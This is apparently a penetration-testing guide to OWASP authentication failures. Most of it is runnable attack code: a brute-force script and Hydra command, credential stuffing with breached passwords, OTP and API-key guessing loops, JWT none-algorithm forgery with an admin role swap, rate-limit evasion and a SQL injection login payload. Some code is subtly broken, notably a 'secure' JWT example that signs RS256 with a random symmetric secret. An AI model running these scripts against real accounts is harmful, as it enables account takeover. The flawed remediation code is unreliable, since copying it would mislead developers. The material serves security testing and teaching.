OWASP A07:2021 - Identification and Authentication Failures

Overview

Identification and Authentication Failures occur when application functions related to user identity, authentication, and session management are implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or exploit other implementation flaws to assume other users' identities temporarily or permanently.

Risk Rating

• Prevalence: Common

• Detectability: Average

• Impact: High

• CVSS Score Range: 3.0-8.5 (depending on specific vulnerability)

Common Authentication Vulnerabilities

1. Weak Password Policies

• No complexity requirements

• Default or commonly used passwords

• Passwords stored in plaintext or weak hashing

• Password reuse allowed

• No account lockout mechanisms

2. Session Management Flaws

• Predictable session IDs

• Session fixation vulnerabilities

• Sessions not invalidated on logout

• Long session timeouts

• Session tokens in URLs

3. Multi-Factor Authentication Bypasses

• MFA not enforced for critical operations

• Backup codes improperly implemented

• SMS/Email OTP vulnerabilities

• TOTP implementation flaws

4. Account Enumeration

• Username enumeration via login responses

• Password reset functionality revealing valid accounts

• Registration process disclosing existing users

• Timing attacks on authentication

5. Credential Recovery Issues

• Insecure password reset mechanisms

• Predictable recovery tokens

• Account recovery bypassing authentication

• Security questions with easily guessable answers

Penetration Testing Methodology

1. Authentication Mechanism Discovery

Initial Reconnaissance

# Identify authentication endpoints
gobuster dir -u http://target.com -w auth-endpoints.txt
# Common endpoints: /login, /auth, /signin, /sso, /oauth, /api/auth

# Technology stack identification for auth systems
whatweb http://target.com/login
curl -s http://target.com/login | grep -i "oauth\|saml\|ldap\|active directory"

# Check for multiple authentication methods
curl -s http://target.com/login | grep -oE "(google|facebook|github|microsoft|okta)"

Authentication Flow Analysis

# Capture authentication requests
burpsuite # Use Burp Suite or similar proxy

# Manual analysis of auth flow
curl -c cookies.txt -b cookies.txt -X POST http://target.com/login \
  -d "username=test&password=test" -v

# Check for authentication bypass paths
curl http://target.com/admin -v
curl http://target.com/api/user/profile -v
curl http://target.com/dashboard -v

2. Username Enumeration Testing

Login Response Analysis

import requests
import time

def test_username_enum(base_url, usernames):
    results = {}
    
    for username in usernames:
        # Test valid vs invalid usernames
        data = {"username": username, "password": "invalidpassword"}
        
        start_time = time.time()
        response = requests.post(f"{base_url}/login", data=data)
        response_time = time.time() - start_time
        
        results[username] = {
            "status_code": response.status_code,
            "response_time": response_time,
            "content_length": len(response.content),
            "response_text": response.text[:200]
        }
        
        time.sleep(1)  # Avoid rate limiting
    
    return results

# Test with common usernames
usernames = ["admin", "administrator", "test", "user", "guest", "nonexistent"]
results = test_username_enum("http://target.com", usernames)

Registration Endpoint Testing

# Test user registration for enumeration
curl -X POST http://target.com/register \
  -d "username=admin&email=admin@test.com&password=password123" \
  -H "Content-Type: application/x-www-form-urlencoded"

# Check response differences
curl -X POST http://target.com/register \
  -d "username=newuser123&email=new@test.com&password=password123" \
  -H "Content-Type: application/x-www-form-urlencoded"

Password Reset Enumeration

# Test password reset functionality
curl -X POST http://target.com/forgot-password \
  -d "email=admin@target.com" \
  -H "Content-Type: application/x-www-form-urlencoded"

curl -X POST http://target.com/forgot-password \
  -d "email=nonexistent@target.com" \
  -H "Content-Type: application/x-www-form-urlencoded"

3. Password-Based Attacks

Brute Force Testing

# Hydra brute force attack
hydra -l admin -P passwords.txt http-post-form "target.com:80:/login:username=^USER^&password=^PASS^:Invalid credentials" -t 10

# Custom brute force script
cat > brute_force.py << 'EOF'
import requests
import threading
from queue import Queue

def brute_force_worker(q, target_url):
    while not q.empty():
        username, password = q.get()
        
        data = {"username": username, "password": password}
        response = requests.post(target_url, data=data)
        
        if "Invalid" not in response.text and response.status_code == 200:
            print(f"SUCCESS: {username}:{password}")
        
        q.task_done()

# Usage
target_url = "http://target.com/login"
credentials = Queue()

# Add username/password combinations
with open("usernames.txt") as f:
    usernames = f.read().splitlines()
with open("passwords.txt") as f:
    passwords = f.read().splitlines()

for username in usernames:
    for password in passwords[:100]:  # Limit attempts
        credentials.put((username, password))

# Start threads
for i in range(5):  # 5 concurrent threads
    t = threading.Thread(target=brute_force_worker, args=(credentials, target_url))
    t.daemon = True
    t.start()

credentials.join()
EOF

python3 brute_force.py

Credential Stuffing

import requests
import json

def credential_stuffing(target_url, credentials_file):
    successful_logins = []
    
    with open(credentials_file, 'r') as f:
        for line in f:
            email, password = line.strip().split(':')
            
            data = {"email": email, "password": password}
            response = requests.post(target_url, data=data)
            
            # Check for successful login indicators
            if any(indicator in response.text.lower() for indicator in 
                   ["dashboard", "welcome", "profile", "logout"]):
                successful_logins.append(f"{email}:{password}")
                print(f"SUCCESS: {email}:{password}")
    
    return successful_logins

# Usage with breach data
creds = credential_stuffing("http://target.com/login", "breach_credentials.txt")

4. Session Management Testing

Session Token Analysis

# Capture and analyze session tokens
curl -c cookies.txt -X POST http://target.com/login -d "username=test&password=test123"

# Extract session token
grep -o 'JSESSIONID=[^;]*' cookies.txt
grep -o 'session=[^;]*' cookies.txt

# Test session token predictability
for i in {1..10}; do
    curl -c cookies$i.txt -X POST http://target.com/login -d "username=user$i&password=pass$i"
    grep -o 'session=[^;]*' cookies$i.txt
done

Session Fixation Testing

import requests

def test_session_fixation(target_url):
    # Step 1: Get a session before authentication
    session = requests.Session()
    pre_auth_response = session.get(target_url)
    pre_auth_cookies = session.cookies.get_dict()
    print("Pre-auth cookies:", pre_auth_cookies)
    
    # Step 2: Authenticate with the existing session
    login_data = {"username": "test", "password": "test123"}
    login_response = session.post(f"{target_url}/login", data=login_data)
    post_auth_cookies = session.cookies.get_dict()
    print("Post-auth cookies:", post_auth_cookies)
    
    # Step 3: Check if session ID changed
    if pre_auth_cookies == post_auth_cookies:
        print("VULNERABLE: Session fixation possible - session ID not changed after login")
    else:
        print("SECURE: Session ID changed after authentication")

test_session_fixation("http://target.com")

Session Timeout Testing

import requests
import time

def test_session_timeout(target_url, username, password):
    session = requests.Session()
    
    # Login
    login_data = {"username": username, "password": password}
    login_response = session.post(f"{target_url}/login", data=login_data)
    
    if "dashboard" in login_response.text.lower():
        print("Login successful")
        
        # Test access to protected resource
        protected_response = session.get(f"{target_url}/profile")
        print(f"Initial access: {protected_response.status_code}")
        
        # Wait and test again (adjust time as needed)
        print("Waiting 30 minutes to test session timeout...")
        time.sleep(1800)  # 30 minutes
        
        timeout_response = session.get(f"{target_url}/profile")
        print(f"After timeout: {timeout_response.status_code}")
        
        if timeout_response.status_code == 200:
            print("WARNING: Session may not have proper timeout")

test_session_timeout("http://target.com", "testuser", "testpass")

5. Multi-Factor Authentication Testing

TOTP Implementation Testing

import requests
import pyotp
import time

def test_totp_bypass(target_url, username, password):
    session = requests.Session()
    
    # Step 1: Initial login
    login_data = {"username": username, "password": password}
    response = session.post(f"{target_url}/login", data=login_data)
    
    # Check if MFA is required
    if "mfa" in response.text.lower() or "two-factor" in response.text.lower():
        print("MFA required - testing bypasses")
        
        # Test 1: Try to access protected resources directly
        bypass_response = session.get(f"{target_url}/dashboard")
        if bypass_response.status_code == 200:
            print("VULNERABLE: MFA bypass possible - direct access to protected resources")
        
        # Test 2: Try invalid/old TOTP codes
        old_codes = ["000000", "123456", "111111"]
        for code in old_codes:
            mfa_data = {"mfa_code": code}
            mfa_response = session.post(f"{target_url}/verify-mfa", data=mfa_data)
            if "success" in mfa_response.text.lower():
                print(f"VULNERABLE: Weak MFA - accepted code: {code}")
        
        # Test 3: Rate limiting on MFA attempts
        for i in range(20):
            mfa_data = {"mfa_code": f"{i:06d}"}
            mfa_response = session.post(f"{target_url}/verify-mfa", data=mfa_data)
            if "blocked" in mfa_response.text.lower():
                print(f"Rate limiting activated after {i+1} attempts")
                break

test_totp_bypass("http://target.com", "testuser", "testpass")

SMS/Email OTP Testing

# Test for OTP in response
curl -X POST http://target.com/send-otp -d "phone=+1234567890" -v | grep -oE "[0-9]{4,6}"

# Test OTP reuse
curl -X POST http://target.com/verify-otp -d "otp=123456"
curl -X POST http://target.com/verify-otp -d "otp=123456"  # Second attempt with same OTP

# Test predictable OTP patterns
for i in {000000..999999..111111}; do
    response=$(curl -s -X POST http://target.com/verify-otp -d "otp=$i")
    if [[ $response == *"success"* ]]; then
        echo "Valid OTP found: $i"
    fi
done

Advanced Authentication Testing

1. OAuth/SAML Testing

OAuth Flow Analysis

import requests
from urllib.parse import parse_qs, urlparse

def test_oauth_flow(client_id, redirect_uri, scope="openid profile"):
    # Step 1: Authorization request
    auth_url = f"https://oauth-provider.com/auth?client_id={client_id}&redirect_uri={redirect_uri}&response_type=code&scope={scope}"
    print(f"Authorization URL: {auth_url}")
    
    # Step 2: Capture authorization code (manual step)
    auth_code = input("Enter authorization code from callback: ")
    
    # Step 3: Token exchange
    token_data = {
        "grant_type": "authorization_code",
        "client_id": client_id,
        "client_secret": "CLIENT_SECRET",  # If available
        "code": auth_code,
        "redirect_uri": redirect_uri
    }
    
    token_response = requests.post("https://oauth-provider.com/token", data=token_data)
    tokens = token_response.json()
    
    # Test token validation
    headers = {"Authorization": f"Bearer {tokens.get('access_token')}"}
    user_info = requests.get("https://oauth-provider.com/userinfo", headers=headers)
    
    print("User info:", user_info.json())

# Test OAuth implementation flaws
def test_oauth_vulnerabilities():
    # Test 1: State parameter bypass
    # Test 2: Redirect URI manipulation  
    # Test 3: Client secret exposure
    # Test 4: Token leakage
    pass

SAML Testing

import base64
import xml.etree.ElementTree as ET
from urllib.parse import unquote

def analyze_saml_response(saml_response_b64):
    # Decode SAML response
    saml_xml = base64.b64decode(saml_response_b64).decode('utf-8')
    saml_xml = unquote(saml_xml)
    
    print("SAML Response:")
    print(saml_xml)
    
    # Parse XML
    root = ET.fromstring(saml_xml)
    
    # Check for signature validation bypasses
    # Look for unsigned assertions
    # Check for XML signature wrapping attacks
    
    return saml_xml

# Test SAML vulnerabilities
def test_saml_vulnerabilities(saml_response):
    # Test 1: XML signature wrapping
    # Test 2: Unsigned assertions
    # Test 3: Signature bypass
    # Test 4: XXE injection
    pass

2. JWT Token Testing

JWT Analysis and Manipulation

import jwt
import json
import base64
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa

def analyze_jwt(token):
    try:
        # Decode without verification to analyze structure
        header = jwt.get_unverified_header(token)
        payload = jwt.decode(token, options={"verify_signature": False})
        
        print("JWT Header:", json.dumps(header, indent=2))
        print("JWT Payload:", json.dumps(payload, indent=2))
        
        return header, payload
    except Exception as e:
        print(f"Error decoding JWT: {e}")

def test_jwt_vulnerabilities(token):
    header, payload = analyze_jwt(token)
    
    # Test 1: None algorithm attack
    none_header = header.copy()
    none_header['alg'] = 'none'
    
    none_payload = payload.copy()
    none_payload['role'] = 'admin'  # Privilege escalation
    
    # Create unsigned JWT
    none_token = base64.urlsafe_b64encode(json.dumps(none_header).encode()).rstrip(b'=').decode()
    none_token += '.'
    none_token += base64.urlsafe_b64encode(json.dumps(none_payload).encode()).rstrip(b'=').decode()
    none_token += '.'  # No signature
    
    print("None algorithm attack token:", none_token)
    
    # Test 2: Weak secret brute force
    common_secrets = ['secret', 'key', 'password', '123456', 'jwt_secret']
    for secret in common_secrets:
        try:
            decoded = jwt.decode(token, secret, algorithms=['HS256'])
            print(f"JWT secret found: {secret}")
            break
        except jwt.InvalidSignatureError:
            continue
    
    # Test 3: Key confusion attack (RS256 to HS256)
    # This requires the public key of the RS256 token

def create_malicious_jwt(payload_changes, secret='secret'):
    malicious_payload = payload.copy()
    malicious_payload.update(payload_changes)
    
    malicious_token = jwt.encode(malicious_payload, secret, algorithm='HS256')
    return malicious_token

# Usage
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
test_jwt_vulnerabilities(token)

3. API Authentication Testing

API Key Testing

# Test API key in different locations
curl -H "X-API-Key: test123" http://target.com/api/users
curl -H "Authorization: Bearer test123" http://target.com/api/users
curl "http://target.com/api/users?api_key=test123"

# Test API key brute force
for key in $(cat api_keys.txt); do
    response=$(curl -s -H "X-API-Key: $key" http://target.com/api/users)
    if [[ $response != *"Unauthorized"* ]]; then
        echo "Valid API key: $key"
    fi
done

# Test API key predictability
curl -H "X-API-Key: user1_api_key" http://target.com/api/users/1
curl -H "X-API-Key: user2_api_key" http://target.com/api/users/2

HTTP Basic/Digest Authentication

import requests
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
import base64

def test_basic_auth(target_url):
    # Test weak credentials
    credentials = [
        ('admin', 'admin'),
        ('admin', 'password'),
        ('root', 'root'),
        ('test', 'test')
    ]
    
    for username, password in credentials:
        response = requests.get(target_url, auth=HTTPBasicAuth(username, password))
        if response.status_code == 200:
            print(f"Valid credentials: {username}:{password}")
    
    # Test for base64 decoding
    auth_header = "Basic YWRtaW46cGFzc3dvcmQ="  # admin:password
    decoded = base64.b64decode(auth_header.split()[1]).decode('utf-8')
    print(f"Decoded credentials: {decoded}")

def test_digest_auth(target_url):
    # Digest auth is more secure but can still be attacked
    response = requests.get(target_url, auth=HTTPDigestAuth('admin', 'password'))
    return response.status_code == 200

Password Reset and Recovery Testing

1. Password Reset Token Analysis

import requests
import hashlib
import time
from datetime import datetime

def test_password_reset_tokens(email, reset_endpoint):
    tokens = []
    
    # Generate multiple reset tokens
    for i in range(10):
        data = {"email": email}
        response = requests.post(reset_endpoint, data=data)
        
        # Extract token from response/email (simulation)
        # In real testing, you'd get these from intercepted emails
        token = f"simulated_token_{i}"
        tokens.append({
            'token': token,
            'timestamp': datetime.now(),
            'sequence': i
        })
        
        time.sleep(1)
    
    # Analyze token patterns
    print("Generated tokens:")
    for token_info in tokens:
        print(f"Token: {token_info['token']}, Time: {token_info['timestamp']}")
    
    # Test token predictability
    # Check if tokens are based on timestamp, user ID, etc.
    
    return tokens

def test_token_reuse(reset_url, token):
    # Test if token can be used multiple times
    data = {"token": token, "new_password": "newpass123"}
    
    first_use = requests.post(reset_url, data=data)
    second_use = requests.post(reset_url, data=data)
    
    if first_use.status_code == 200 and second_use.status_code == 200:
        print("VULNERABLE: Password reset token can be reused")
    else:
        print("SECURE: Token invalidated after use")

2. Account Recovery Testing

# Test security question bypass
curl -X POST http://target.com/forgot-password \
  -d "email=admin@target.com" \
  -H "Content-Type: application/x-www-form-urlencoded"

# Test security question enumeration
curl -X POST http://target.com/security-question \
  -d "email=admin@target.com" \
  -H "Content-Type: application/x-www-form-urlencoded"

# Brute force security questions
common_answers=("password" "123456" "admin" "mother" "dog" "cat")
for answer in "${common_answers[@]}"; do
    response=$(curl -s -X POST http://target.com/verify-answer \
      -d "answer=$answer" \
      -H "Content-Type: application/x-www-form-urlencoded")
    if [[ $response == *"correct"* ]]; then
        echo "Security question answer: $answer"
    fi
done

Remediation Guidelines

1. Strong Authentication Implementation

• Implement strong password policies (length, complexity, history)

• Use secure password hashing (bcrypt, scrypt, Argon2)

• Implement account lockout mechanisms

• Require multi-factor authentication for sensitive operations

2. Secure Session Management

# Example secure session implementation
import secrets
import hashlib
from datetime import datetime, timedelta

class SecureSessionManager:
    def __init__(self):
        self.sessions = {}
    
    def create_session(self, user_id):
        # Generate cryptographically secure session ID
        session_id = secrets.token_urlsafe(32)
        
        # Set session expiration
        expiration = datetime.now() + timedelta(hours=2)
        
        self.sessions[session_id] = {
            'user_id': user_id,
            'created_at': datetime.now(),
            'expires_at': expiration,
            'ip_address': None,  # Should be set from request
            'user_agent': None   # Should be set from request
        }
        
        return session_id
    
    def validate_session(self, session_id, ip_address, user_agent):
        if session_id not in self.sessions:
            return False
        
        session = self.sessions[session_id]
        
        # Check expiration
        if datetime.now() > session['expires_at']:
            del self.sessions[session_id]
            return False
        
        # Check IP address consistency (optional)
        if session['ip_address'] and session['ip_address'] != ip_address:
            return False
        
        return True

3. JWT Security Best Practices

import jwt
from datetime import datetime, timedelta
import secrets

def create_secure_jwt(user_id, role='user'):
    # Use strong secret key
    secret_key = secrets.token_urlsafe(64)  # Store securely
    
    payload = {
        'user_id': user_id,
        'role': role,
        'iat': datetime.utcnow(),
        'exp': datetime.utcnow() + timedelta(hours=1),
        'jti': secrets.token_urlsafe(16)  # JWT ID for revocation
    }
    
    # Use strong algorithm
    token = jwt.encode(payload, secret_key, algorithm='RS256')
    return token

def validate_jwt(token, public_key):
    try:
        payload = jwt.decode(token, public_key, algorithms=['RS256'])
        
        # Additional validation
        if 'jti' not in payload:
            raise jwt.InvalidTokenError("Missing JWT ID")
        
        # Check if token is revoked (implement revocation list)
        # if is_token_revoked(payload['jti']):
        #     raise jwt.InvalidTokenError("Token revoked")
        
        return payload
    except jwt.InvalidTokenError:
        return None

Common Bypasses and Advanced Techniques

1. Rate Limiting Bypass

import requests
import time
from concurrent.futures import ThreadPoolExecutor

def bypass_rate_limiting(target_url, credentials):
    # Technique 1: Distributed requests from multiple IPs
    # Technique 2: Vary user-agent and headers
    # Technique 3: Use different HTTP methods
    
    headers_list = [
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
        {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"},
        {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}
    ]
    
    def attempt_login(cred):
        username, password = cred
        headers = headers_list[hash(username) % len(headers_list)]
        
        data = {"username": username, "password": password}
        response = requests.post(target_url, data=data, headers=headers)
        
        if "Invalid" not in response.text:
            return f"SUCCESS: {username}:{password}"
        return None
    
    # Use threading to distribute requests
    with ThreadPoolExecutor(max_workers=3) as executor:
        results = executor.map(attempt_login, credentials)
    
    return [r for r in results if r]

2. Authentication Logic Flaws

def test_auth_logic_flaws(target_url):
    # Test 1: Parameter pollution
    data1 = "username=admin&password=wrong&username=guest&password=guest"
    response1 = requests.post(target_url, data=data1, 
                             headers={"Content-Type": "application/x-www-form-urlencoded"})
    
    # Test 2: Array parameter manipulation
    data2 = {"username[]": ["admin", "guest"], "password[]": ["wrong", "guest"]}
    response2 = requests.post(target_url, json=data2)
    
    # Test 3: Boolean bypass
    data3 = {"username": "admin", "password": True}
    response3 = requests.post(target_url, json=data3)
    
    # Test 4: SQL injection in login
    data4 = {"username": "admin'--", "password": "anything"}
    response4 = requests.post(target_url, data=data4)
    
    return [response1, response2, response3, response4]

Reporting Template

Finding Description

Title: Authentication Bypass - [Specific Vulnerability]
Severity: [Critical/High/Medium/Low]
CVSS Score: [X.X]

Description:
The application's authentication mechanism contains a vulnerability that allows an attacker to [specific attack description].

Affected Components:
- Login endpoint: /login
- Session management: /api/session
- Password reset: /forgot-password

Evidence:
[Screenshots of successful bypass]
[Command outputs showing vulnerability]
[Proof of concept code]

Steps to Reproduce:
1. [Step 1]
2. [Step 2]
3. [Step 3]

Impact:
An attacker could exploit this vulnerability to:
- Gain unauthorized access to user accounts
- Bypass authentication controls
- Escalate privileges

Recommendation:
[Specific remediation steps based on vulnerability type]

References:
- OWASP Authentication Cheat Sheet
- Relevant CVE numbers
- Security best practice guides

Tools and Resources

Authentication Testing Tools

• Burp Suite - Web application security testing platform

• Hydra - Network login cracker

• John the Ripper - Password cracking tool

• Hashcat - Advanced password recovery tool

• JWT Tool - JWT manipulation and testing

• OAuth/SAML Pen-Testing Tools - Specialized testing frameworks

Custom Scripts and Frameworks

• AuthMatrix - Burp Suite extension for authorization testing

• Autorize - Burp Suite extension for access control testing

• Custom Python scripts - For specific authentication testing scenarios

Prevention Best Practices

1. Strong Authentication: Implement multi-factor authentication and strong password policies

2. Secure Session Management: Use secure, random session identifiers and proper timeout

3. Account Security: Implement account lockout and monitoring for suspicious activities

4. Secure Password Recovery: Use secure tokens and multi-step verification for password resets

5. Regular Security Testing: Conduct regular penetration testing of authentication mechanisms

References and Further Reading

• OWASP Authentication Cheat Sheet

• OWASP Session Management Cheat Sheet

• NIST Digital Identity Guidelines

• JWT Security Best Practices

• OAuth 2.0 Security Considerations

• SAML Security Guidelines